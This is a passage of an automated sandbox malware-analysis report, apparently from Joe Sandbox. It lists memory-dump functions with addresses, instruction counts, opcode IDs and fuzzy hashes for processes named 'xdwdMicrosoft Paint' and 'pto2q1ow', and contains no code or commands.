                              • Snapshot File: hcaresult_17_2_7fff60f50000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: eb65ced9a50445ba8fc7b8d4f53ade41dd3d12624671f02cbf7b23c081541d94
                              • Instruction ID: 8056777e42f3d5b3b5c052d8d27c97fc023b2ae2cb693bb238e66ee3434d2da6
                              • Opcode Fuzzy Hash: eb65ced9a50445ba8fc7b8d4f53ade41dd3d12624671f02cbf7b23c081541d94
                              • Instruction Fuzzy Hash: 43E01211F3D81B96B6AA216E68551B936C1DBA9B50F740536E40DE23C9FE8CAC834293
                              Function 00007FFF60F5C0F1 Relevance: .0, Instructions: 32COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000011.00000002.1201732744.00007FFF60F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_7fff60f50000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b75ac856f5992ea6b4a40662123a8baec133f3094d03bdc6a578798425cf89c0
                              • Instruction ID: 9e2d8ae9b5a633f3bd1c3e4153a7098ac232386298f4cfd60407948e10fcd2fa
                              • Opcode Fuzzy Hash: b75ac856f5992ea6b4a40662123a8baec133f3094d03bdc6a578798425cf89c0
                              • Instruction Fuzzy Hash: 49E0DF2591C9544FE7022254F4C10F963E0EFAA320F2808B2D809D72C3CC0D25638388
                              Function 00007FFF60F53810 Relevance: .0, Instructions: 32COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000011.00000002.1201732744.00007FFF60F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_7fff60f50000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 971acc9bfd26c9beed09d3f60a2bf36c8a6b05a9e9976cd4c38638e5d93d7e96
                              • Instruction ID: 4ecf1becda060c40759e1f52679d4337c75bffa4cb6b45d23a01ff7671733dc9
                              • Opcode Fuzzy Hash: 971acc9bfd26c9beed09d3f60a2bf36c8a6b05a9e9976cd4c38638e5d93d7e96
                              • Instruction Fuzzy Hash: 9CE06D32E1C93A8AF699363CA1052F852C1EB59361F9908B7E80DD33D2FD1D9D814280
                              Function 00007FFF60F5BC51 Relevance: .0, Instructions: 31COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000011.00000002.1201732744.00007FFF60F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_7fff60f50000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 00c75aae0c16b4651a89cbd4dce9b7893faf05e11d01fcc91a4eb96357f563db
                              • Instruction ID: e709cc4794f72c805aa87e8fd64df7cf8deb33f2700fd6c8e87defb74008dcf5
                              • Opcode Fuzzy Hash: 00c75aae0c16b4651a89cbd4dce9b7893faf05e11d01fcc91a4eb96357f563db
                              • Instruction Fuzzy Hash: A6E02A1080C2A28FE3220320A0A81F837D0FF66220F2909B6C808ABAD3CC2E29424309
                              Function 00007FFF60F5865E Relevance: .0, Instructions: 28COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000011.00000002.1201732744.00007FFF60F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_7fff60f50000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 632e22bcd85ffa10698d665b84b6ac8b02d98ae4682d7cb0edf2381e11a699d6
                              • Instruction ID: 007de1ab732e26c6d12b1dac164158da3cdfbc1b3c93c72ca2f4bfd08428591b
                              • Opcode Fuzzy Hash: 632e22bcd85ffa10698d665b84b6ac8b02d98ae4682d7cb0edf2381e11a699d6
                              • Instruction Fuzzy Hash: A6F03920E3D9079AFB66A22895891B612C1EF28345F744474D90BE36C6ED9CBC428282
                              Function 00007FFF60F5C9BC Relevance: .0, Instructions: 27COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000011.00000002.1201732744.00007FFF60F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_7fff60f50000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 88da4467cee281c8b0666ca79474080cfb2142183fd305144330f16d3db8ba62
                              • Instruction ID: a7ec8cea01c5f6091995dbbaa55686ac1c329f3da7580f4a5762664f0a89b193
                              • Opcode Fuzzy Hash: 88da4467cee281c8b0666ca79474080cfb2142183fd305144330f16d3db8ba62
                              • Instruction Fuzzy Hash: 55E04F01B18D8A9FE786B72840A92BC57D3FFA9305B28047ED40AD3397FE586C538345
                              Function 00007FFF60F5C28A Relevance: .0, Instructions: 19COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000011.00000002.1201732744.00007FFF60F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_7fff60f50000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: d66117756e6d7ca0f8c1facb36af2a9f31fa8c1be915c29f6928b0f1bc6ad4af
                              • Instruction ID: c5ffa71bd1116dc300c18bbc42fd41a6b4793bd6021228d18b633ab7299f732c
                              • Opcode Fuzzy Hash: d66117756e6d7ca0f8c1facb36af2a9f31fa8c1be915c29f6928b0f1bc6ad4af
                              • Instruction Fuzzy Hash: 40D05E3160D90DCECF46ABA494053ED77A0FF95319FA0187AE10BD62C1CE7A84A8C7C0
                              Function 00007FFF60F5888C Relevance: .0, Instructions: 16COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000011.00000002.1201732744.00007FFF60F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_7fff60f50000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 82768b18965c2e656710d5d3c51e66e2b639a2187cac72ca216db488fdc5a3aa
                              • Instruction ID: f14825a93f725bfe3c7bbb5dd9cc838044aee1a4181de9a0ab636f6e0fc3f609
                              • Opcode Fuzzy Hash: 82768b18965c2e656710d5d3c51e66e2b639a2187cac72ca216db488fdc5a3aa
                              • Instruction Fuzzy Hash: 78C08C12B1DC085BA680F11C689EBBE63D2E7FC5A1728413AD40EC33A5EC34D9878342
                              Function 00007FFF60F5860C Relevance: .0, Instructions: 15COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000011.00000002.1201732744.00007FFF60F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_7fff60f50000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: c98b4055003132600fb26b63289281e92730e05319c55eb26e8da8c1e763a772
                              • Instruction ID: 11c8be6eb31272ddf964f616eeef82e0b6953db18d907647d011bd19f9dd8280
                              • Opcode Fuzzy Hash: c98b4055003132600fb26b63289281e92730e05319c55eb26e8da8c1e763a772
                              • Instruction Fuzzy Hash: 47D0123164A31589E759373965111A862C1EF45255F9405B9E90DC43A2FD2EC5C14350
                              Function 00007FFF60F5B885 Relevance: .0, Instructions: 9COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000011.00000002.1201732744.00007FFF60F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_7fff60f50000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: cceb4dd2797d54daf5f82da7e9d87be9702c556677e9fbcfe07ffb99d7d76cd8
                              • Instruction ID: 11c8c8abb8210429bacd2fa93b345472f3609ca5d9c22a3646ef0daf05bc4d83
                              • Opcode Fuzzy Hash: cceb4dd2797d54daf5f82da7e9d87be9702c556677e9fbcfe07ffb99d7d76cd8
                              • Instruction Fuzzy Hash: ECB0141113D404555745D714C45D1F573D0D77C1047400F35544DC1155FC005DC14345

                              Executed Functions

                              Function 00007FFF60F620D0 Relevance: 2.5, Strings: 1, Instructions: 1271COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000013.00000002.3353351745.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_7fff60f60000_pto2q1ow.jbxd
                              Similarity
                              • API ID:
                              • String ID: C.L_^
                              • API String ID: 0-3631571998
                              • Opcode ID: 643061eebc69eb08213f8484760db8496234cd379f393e6ed673d56f3376a951
                              • Instruction ID: 885c447148e387ee8d28f92cade71b2d0e3dc25b0b1310abbd10024d3d01e005
                              • Opcode Fuzzy Hash: 643061eebc69eb08213f8484760db8496234cd379f393e6ed673d56f3376a951
                              • Instruction Fuzzy Hash: 2D92E420F2C9478BEB99A73888691793BE6EF95301FA90479E04DC73D3DD2DAC465341
                              Function 00007FFF60F74520 Relevance: 1.5, Strings: 1, Instructions: 293COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000013.00000002.3353351745.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_7fff60f60000_pto2q1ow.jbxd
                              Similarity
                              • API ID:
                              • String ID: s,
                              • API String ID: 0-3539718730
                              • Opcode ID: 41b3aefd7f73ee1385ea798f78988bf157f5b2bb8f039e07085e9a071bab5a3c
                              • Instruction ID: fa042107c1a31e6b1dda5ff446b7ea28fe60b3c4e01baaadfcde2736f90edc89
                              • Opcode Fuzzy Hash: 41b3aefd7f73ee1385ea798f78988bf157f5b2bb8f039e07085e9a071bab5a3c
                              • Instruction Fuzzy Hash: DE91B269D2D3C24FE76A9124A8162B57BE0DF53319F6901FBD488C72D3EE4D680A4393
                              Function 00007FFF60F69369 Relevance: .5, Instructions: 495COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000013.00000002.3353351745.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_7fff60f60000_pto2q1ow.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 7ee17c5884c02017dff750d34af01a6366ec949fa5e78faad2f663754d7c8b47
                              • Instruction ID: 29cd03e61f03acfaeacbbd93b2a64e35305cb8c09865b87844323183c3892c88
                              • Opcode Fuzzy Hash: 7ee17c5884c02017dff750d34af01a6366ec949fa5e78faad2f663754d7c8b47
                              • Instruction Fuzzy Hash: CDF1D925C2D6878FF71AA76488521F57BE8DF52310F1941BEE08AC72D7ED1C640B9392
                              Function 00007FFF60F63280 Relevance: 22.7, Strings: 18, Instructions: 175COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000013.00000002.3353351745.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_7fff60f60000_pto2q1ow.jbxd
                              Similarity
                              • API ID:
                              • String ID: #$#$"#$"#$&#$-#$-#$1#$1#$7#$;#$;#$=#$=#$F#$F#$M#$M#
                              • API String ID: 0-1298366103
                              • Opcode ID: f5d54da407e3c3b0764f32ea4d0e9682dc8e46bf33f20f21e28f8e517a2f80a1
                              • Instruction ID: 99e8a4db40c9cac9f6d31335c0d5b743ffe1c9495bdce66dae55d916591c3003
                              • Opcode Fuzzy Hash: f5d54da407e3c3b0764f32ea4d0e9682dc8e46bf33f20f21e28f8e517a2f80a1
                              • Instruction Fuzzy Hash: CE51B720C2C0569AF3798668E48B075B3C8FB55710F75107DECEA827C3BC1C6DA65197
                              Function 00007FFF60F73A60 Relevance: 1.4, Strings: 1, Instructions: 187COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000013.00000002.3353351745.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_7fff60f60000_pto2q1ow.jbxd
                              Similarity
                              • API ID:
                              • String ID: cJ];
                              • API String ID: 0-3418637786
                              • Opcode ID: 03f27feb42b1dd96e4a473d278eac3ed0dc89e5f14c17c08394414fcc9c98ed1
                              • Instruction ID: beafb6f6e8edd6df892ecf275bfc373dbcc048f0896cdc823a27dba33c8453a0
                              • Opcode Fuzzy Hash: 03f27feb42b1dd96e4a473d278eac3ed0dc89e5f14c17c08394414fcc9c98ed1
                              • Instruction Fuzzy Hash: 93516034A1C94A9FEF94EF6CD489AA977E2EF58305F140479E44DC7392DE28EC428742
                              Function 00007FFF60F684E8 Relevance: 1.4, Strings: 1, Instructions: 180COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000013.00000002.3353351745.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_7fff60f60000_pto2q1ow.jbxd
                              Similarity
                              • API ID:
                              • String ID: 3K
                              • API String ID: 0-4048841140
                              • Opcode ID: 725edb323b2f6ee0b4582356af532165e7fca0eb6cefaee3fa9ba799c7d3583e
                              • Instruction ID: 5f15de83951635ed328dea97439fab28d0b7d5e1e7273b894e71f407aeefab49
                              • Opcode Fuzzy Hash: 725edb323b2f6ee0b4582356af532165e7fca0eb6cefaee3fa9ba799c7d3583e
                              • Instruction Fuzzy Hash: 3551E021A1E7939FE756A77888951B83FE0DF56310F1806FAE449C72D3EC4D688B8352
                              Function 00007FFF60F62284 Relevance: 1.3, Strings: 1, Instructions: 69COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000013.00000002.3353351745.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_7fff60f60000_pto2q1ow.jbxd
                              Similarity
                              • API ID:
                              • String ID: C.L_^
                              • API String ID: 0-3631571998
                              • Opcode ID: f26f366cd5b9a258ef6c33162601828e7103ba7f7b684dadf9ce38ff31f60f02
                              • Instruction ID: 0679cd6e4bc76608cfc3dff8bd7202e1485c960f82b4c71bf914893090083f0b
                              • Opcode Fuzzy Hash: f26f366cd5b9a258ef6c33162601828e7103ba7f7b684dadf9ce38ff31f60f02
                              • Instruction Fuzzy Hash: 0B21BB25E2D94382FBA9A66888572B922C9CF60305F641574F50DC23C7FF1EA91B21A3
                              Function 00007FFF60F616B3 Relevance: 1.3, Strings: 1, Instructions: 63COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000013.00000002.3353351745.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_7fff60f60000_pto2q1ow.jbxd
                              Similarity
                              • API ID:
                              • String ID: #2L_^
                              • API String ID: 0-1535703924
                              • Opcode ID: 7392e7a4bcdccc4b6f9ca429553d16a17eeb9b0e4c4cfbff092027a41fd08230
                              • Instruction ID: 3f39776ac567791d131a4678ed1a836cfae3e265dc71f9b18d1a68ca83f91b23
                              • Opcode Fuzzy Hash: 7392e7a4bcdccc4b6f9ca429553d16a17eeb9b0e4c4cfbff092027a41fd08230
                              • Instruction Fuzzy Hash: 5311AC16E2C00786FB28B26C98972B973C5EBA0324F281675E94EC32C3FD0D695342C2
                              Function 00007FFF60F61689 Relevance: 1.3, Strings: 1, Instructions: 24COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000013.00000002.3353351745.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_7fff60f60000_pto2q1ow.jbxd
                              Similarity
                              • API ID:
                              • String ID: #2L_^
                              • API String ID: 0-1535703924
                              • Opcode ID: 24a6e0ba6b6b291d2773aa2fa2cabc4374e622ec3f106d4d742ba36655bd3045
                              • Instruction ID: f0c829d6d56b00fc9145d8c9cce4edaa16cb07fa74b179ba8dd74db3fd63a3d5
                              • Opcode Fuzzy Hash: 24a6e0ba6b6b291d2773aa2fa2cabc4374e622ec3f106d4d742ba36655bd3045
                              • Instruction Fuzzy Hash: F1E0ED16C6C02785FA702459D4502B8F2C9EB11328F6E0575F95C633C28E0C6E806286
                              Function 00007FFF60F6CFE0 Relevance: .4, Instructions: 428COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000013.00000002.3353351745.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_7fff60f60000_pto2q1ow.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 003dd2202c43653f9f6f35e473c34580ca7a25fc6b1868921111c5491a42d731
                              • Instruction ID: e8d2d44e5074937c9e1c55bafdfe625fc5f8d22fd441b1b83de497ac7e161397
                              • Opcode Fuzzy Hash: 003dd2202c43653f9f6f35e473c34580ca7a25fc6b1868921111c5491a42d731
                              • Instruction Fuzzy Hash: E6D17E32E2C907DBFB99A32C88522B973D6DF94355F650675E00EC73C6EC29A8475382
                              Function 00007FFF60F6B9C0 Relevance: .4, Instructions: 369COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000013.00000002.3353351745.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_7fff60f60000_pto2q1ow.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: f35e1bb9eaae3e54de963de7ca58a2c9f332c0714ef730a8c541905e2ea01329
                              • Instruction ID: 0465d43f8641204f47ca794832dc4e1a23add2aa831c034981a803012d29da86
                              • Opcode Fuzzy Hash: f35e1bb9eaae3e54de963de7ca58a2c9f332c0714ef730a8c541905e2ea01329
                              • Instruction Fuzzy Hash: 87B14431E2C6468FFB24966488A25FC77D4EF55310F34097AF84E8B3D2DD1D2886A382
                              Function 00007FFF60F6CFA9 Relevance: .4, Instructions: 364COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000013.00000002.3353351745.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_7fff60f60000_pto2q1ow.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: a6a91bb93c6eae73138b2381356dcae80fd78437902aa580fe762e8994916eec
                              • Instruction ID: fa85b363fe760b3275b312045287c53fd756b3dd8ceefdf6d41e072279c0eb4e
                              • Opcode Fuzzy Hash: a6a91bb93c6eae73138b2381356dcae80fd78437902aa580fe762e8994916eec
                              • Instruction Fuzzy Hash: DCB15E32E6C9079BEBA9A32C88522B962D6DF95315F650575E00EC73C6EC2CA8475382
                              Function 00007FFF60F623FD Relevance: .3, Instructions: 342COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000013.00000002.3353351745.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_7fff60f60000_pto2q1ow.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 41bd43692b44c722d6356f32e964f87e7460a48e9a9ae18e14c91d3a65434c9a
                              • Instruction ID: 210d5c51d39d4c19e2566245baaf91e34bb1e4ccb79dd0fc4118b08ccf48ffc8
                              • Opcode Fuzzy Hash: 41bd43692b44c722d6356f32e964f87e7460a48e9a9ae18e14c91d3a65434c9a
                              • Instruction Fuzzy Hash: 9BC12911A1E7C64FD747977888790A93FB1AF47211B5A00FBD08ACB2E3CD2D5D4A9322
                              Function 00007FFF60F6468C Relevance: .2, Instructions: 193COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000013.00000002.3353351745.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_7fff60f60000_pto2q1ow.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 1bf475559a8ba1922a045e1b8684f8a0fe8d188488120d7b8620921d9469f023
                              • Instruction ID: ea71a5bb64a97b206d8cbfefbaa38cccf3e62afb8bb76bb65c638a8cef1c9a60
                              • Opcode Fuzzy Hash: 1bf475559a8ba1922a045e1b8684f8a0fe8d188488120d7b8620921d9469f023
                              • Instruction Fuzzy Hash: 9A515E31D18A5C8FDB58EF58D845BE9BBF1FB59310F1082AAD00DE3252DE74A9858F81
                              Function 00007FFF60F66FF0 Relevance: .2, Instructions: 189COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000013.00000002.3353351745.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_7fff60f60000_pto2q1ow.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 48be641a40a86e57d808bfd069930e2cf78923b486c81331f9227ff2fb04236b
                              • Instruction ID: 0918a799347e3d2fb43ecbf2f8a4a18311a3570f835481015cc6f7c536037722
                              • Opcode Fuzzy Hash: 48be641a40a86e57d808bfd069930e2cf78923b486c81331f9227ff2fb04236b
                              • Instruction Fuzzy Hash: D4514F3091CA4E8FEBA8DF28D8457A977E1FF58300F14866EE85DC2395CF7499458B82
                              Function 00007FFF60F62995 Relevance: .2, Instructions: 183COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000013.00000002.3353351745.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_7fff60f60000_pto2q1ow.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 66550bfc2c75f126b13e2e09fffaa34b2d03af98a7e35bdc65f8f0e365c8ff31
                              • Instruction ID: 6b892ed25e42000e625ec4344fc1583ae806627651b2ebfcebe019e8f2ddedf8
                              • Opcode Fuzzy Hash: 66550bfc2c75f126b13e2e09fffaa34b2d03af98a7e35bdc65f8f0e365c8ff31
                              • Instruction Fuzzy Hash: 23511221F2CD1B8AEB94A72884A917976D3EF98312FA90439E00DC73D6DD3DAC426741
                              Function 00007FFF60F67847 Relevance: .2, Instructions: 182COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000013.00000002.3353351745.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_7fff60f60000_pto2q1ow.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 5177199dd6570b6c6016aaae6c62b97d7563b463839d4452a58f09bb30044329
                              • Instruction ID: e6403dd98328b6287fdc6e7bdda2c0a5bd200e4d1df94c48581a1912bc68cbfe
                              • Opcode Fuzzy Hash: 5177199dd6570b6c6016aaae6c62b97d7563b463839d4452a58f09bb30044329
                              • Instruction Fuzzy Hash: 85517130A18A4A8FEBA8DF28D8453E977D1FF54310F14826AE84DC7395CF3899459B82
                              Function 00007FFF60F6AD2F Relevance: .2, Instructions: 179COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000013.00000002.3353351745.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_7fff60f60000_pto2q1ow.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b348d34093a69ae888cc689377115c7dbc6f7bbabc0f712b468a339eed0d6c80
                              • Instruction ID: 52e0f55a5cc6768749d79be3f80831fb699a7add65a572a2c97edb1a274d029b
                              • Opcode Fuzzy Hash: b348d34093a69ae888cc689377115c7dbc6f7bbabc0f712b468a339eed0d6c80
                              • Instruction Fuzzy Hash: 60514D31E2C92ECFEB98EB28D4956B877E5EF58301F500179E40ED3392DE29AC459B41
                              Function 00007FFF60F6A61F Relevance: .2, Instructions: 179COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000013.00000002.3353351745.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_7fff60f60000_pto2q1ow.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: c3ecc725f28631c8042854906e8f97680f241bf228f8acef687134551e668af5
                              • Instruction ID: 473005cfac0a3521f9d479d29026d0542e3c6975b70c4b8c40bf6987f5509284
                              • Opcode Fuzzy Hash: c3ecc725f28631c8042854906e8f97680f241bf228f8acef687134551e668af5
                              • Instruction Fuzzy Hash: 9A51DC31E2C92E8FEB95E768C4552B9B7E5FF58300F540179E40DD3395EE29AC029B41
                              Function 00007FFF60F648B1 Relevance: .2, Instructions: 175COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000013.00000002.3353351745.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_7fff60f60000_pto2q1ow.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: f20e734211d408041edd37ac8d49b286ecf29699be75a45e8063e4edcae701c2
                              • Instruction ID: 5e8bcef1cd026a70ec11193fd25dc58061dfdfa32adf9140b1b349224c4f2ffe
                              • Opcode Fuzzy Hash: f20e734211d408041edd37ac8d49b286ecf29699be75a45e8063e4edcae701c2
                              • Instruction Fuzzy Hash: 6151BE3190CB5C8FDB59EB68D8457E9BBF1EF99310F1442AED049D3292CB74A845CB82
                              Function 00007FFF60F62EFC Relevance: .2, Instructions: 175COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000013.00000002.3353351745.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_7fff60f60000_pto2q1ow.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: c71b93a0a490aed67a614a52d96784fc8ec4bbbdb1b62175ffc94d9f6735d365
                              • Instruction ID: 3e89f76ac64fc1a1e79672defeb5a841176aa6fc826ff022a7b8212b217760b2
                              • Opcode Fuzzy Hash: c71b93a0a490aed67a614a52d96784fc8ec4bbbdb1b62175ffc94d9f6735d365
                              • Instruction Fuzzy Hash: 8C513621F2C81686EB98A738D46957D26D7EB84312FA90439F00DC77D6CD3DAD426740
                              Function 00007FFF60F62BE9 Relevance: .2, Instructions: 169COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000013.00000002.3353351745.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_7fff60f60000_pto2q1ow.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 78d447f2f19cf79193ee8a6033467bb6cea3ac4e8d479a378acb79324aaa4c95
                              • Instruction ID: 97eb1005bcb5adb7805f2c8b4549a82966a5e843a904e177b644aa265a3b722c
                              • Opcode Fuzzy Hash: 78d447f2f19cf79193ee8a6033467bb6cea3ac4e8d479a378acb79324aaa4c95
                              • Instruction Fuzzy Hash: B3514151F2C81B87FB98A768D8AA27D62D6EF94312FA90438F10DC73C6DD2DAC425741
                              Function 00007FFF60F6152F Relevance: .2, Instructions: 166COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000013.00000002.3353351745.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_7fff60f60000_pto2q1ow.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
